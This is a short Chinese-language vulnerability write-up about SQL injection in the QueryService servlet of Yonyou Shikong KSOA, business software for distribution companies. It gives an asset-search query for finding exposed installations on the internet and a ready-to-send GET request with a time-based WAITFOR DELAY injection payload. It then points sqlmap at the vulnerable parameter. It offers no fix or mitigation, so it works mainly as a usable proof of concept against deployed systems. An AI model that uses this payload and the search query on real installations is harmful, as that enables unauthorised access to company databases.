登录 白背景
源码

用友时空KSOA QueryService存在SQL注入漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.9);">用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台QueryService存在SQL注入漏洞。</font>

<font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>

  • 用友时空KSOA

三、资产测绘

  • hunterapp.name="用友时空 KSOA"

1692118414187-50a002bf-7b35-4a5e-9cca-410e053dfd86.png

  • 登录页面

1692118428299-ee3e89a1-d166-4649-b288-943ccd7d5fc7.png

四、漏洞复现

GET /servlet/com.sksoft.bill.QueryService?service=query&content=%3BWAITFOR+DELAY+%270%3A0%3A5%27--+ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

1712395016169-f1299bcf-05ad-4cf0-ab89-801c54c6875a.png

sqlmap

/servlet/com.sksoft.bill.QueryService?service=query&content=

1712395033807-b7c289b7-3f21-4c6b-9c91-9da931b84773.png

原文: https://www.yuque.com/xiaokp7/ocvun2/ne6tgnypdc2q8ml1